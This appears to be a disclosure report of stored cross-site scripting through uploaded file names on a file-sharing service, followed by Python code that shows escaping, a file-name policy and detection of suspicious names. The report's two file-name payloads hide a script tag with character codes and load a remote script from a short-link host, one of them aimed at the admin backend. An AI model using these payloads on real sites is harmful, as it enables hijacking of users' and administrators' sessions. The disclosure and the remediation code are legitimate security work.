### Brief description:

Hits whoever you aim it at, including the admin backend.

### Detailed description:

On Linux, `<` and `>` are allowed in file names. Upload a file whose name is

```
<img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)">
```

and share it with a friend, and you can hit whichever user you choose. To hit the admin backend, upload a file named

```
"</a><img src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,116,46,99,110,47,56,115,51,118,66,49,54);document.body.appendChild(window.s)">
```

I'm being lazy, so I didn't audit the code.

### Proof of vulnerability:

[![2.jpg](https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg)](https://images.seebug.org/upload/201405/01205001b75335b69b47b4bcaecaa3a0caea597d.jpg)

[![1.jpg](https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg)](https://images.seebug.org/upload/201405/01204819dc4b5ff9fffe3d0f6b22a4095755e9a5.jpg)
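The root cause described above is a file name being written into HTML (an `<a>` tag and its attributes) without encoding, so a name containing `<`, `>` or `"` becomes markup in whoever views the share listing. The following is an added illustration, not code from the report or from the affected application, showing the two layers of defence a fix would need: an input-side file name policy and, more importantly, output-side HTML encoding of the name in both attribute and text context. The sample names and the allowed-character policy are constructed for this example; the `tag_count` helper is a hypothetical check used only to show that the encoded rendering contains exactly the tags the template itself emits.

```python
import html
import re

# Constructed sample file names, modelled on the pattern in the report:
# ordinary name, a name that is itself an HTML tag, and a name that first
# closes the surrounding attribute and <a> element before injecting a tag.
SAMPLE_NAMES = [
    "report.pdf",
    '<img src="1"onerror="alert(1)">',
    '"</a><img src="1"onerror="alert(1)">',
]

# Hypothetical upload policy: letters, digits, space, dot, dash, underscore.
# Linux itself accepts '<' and '>' in names, so the web layer must not rely on the OS.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,255}$")


def is_acceptable_filename(name: str) -> bool:
    """Input-side check: reject names no legitimate user file should carry."""
    if name in (".", "..") or "/" in name or "\x00" in name:
        return False
    return SAFE_NAME_RE.fullmatch(name) is not None


def render_unsafe_row(name: str, url: str) -> str:
    """The vulnerable pattern: the raw name lands in an attribute and in text."""
    return f'<a href="{url}" title="{name}">{name}</a>'


def render_share_row(name: str, url: str) -> str:
    """Output-side defence: html.escape with quote=True covers both contexts.

    quote=True is essential here: without it '"' would survive, and the
    second sample name could still break out of the title attribute.
    """
    safe_name = html.escape(name, quote=True)
    safe_url = html.escape(url, quote=True)
    return f'<a href="{safe_url}" title="{safe_name}">{safe_name}</a>'


def tag_count(rendered: str) -> int:
    """Count tag openers ('<' followed by a letter or '/') in rendered HTML."""
    return len(re.findall(r"<[A-Za-z/]", rendered))


def find_suspicious_names(names) -> list:
    """Detection aid for an existing share store: names that would alter markup."""
    return [n for n in names if any(c in n for c in '<>"\'&')]


if __name__ == "__main__":
    for i, name in enumerate(SAMPLE_NAMES):
        url = f"/files/{i}"
        print("policy accepts:", is_acceptable_filename(name))
        print("unsafe tags:", tag_count(render_unsafe_row(name, url)))
        print("escaped tags:", tag_count(render_share_row(name, url)))
    print("suspicious:", find_suspicious_names(SAMPLE_NAMES))
```

The escaped rendering of every sample name yields exactly two tags, the template's own `<a>` and `</a>`, whereas the unescaped rendering of the attribute-breaking name yields six. The same encoding has to be applied wherever the name is displayed, which in the report's case includes the admin backend listing, not only the share page a friend sees.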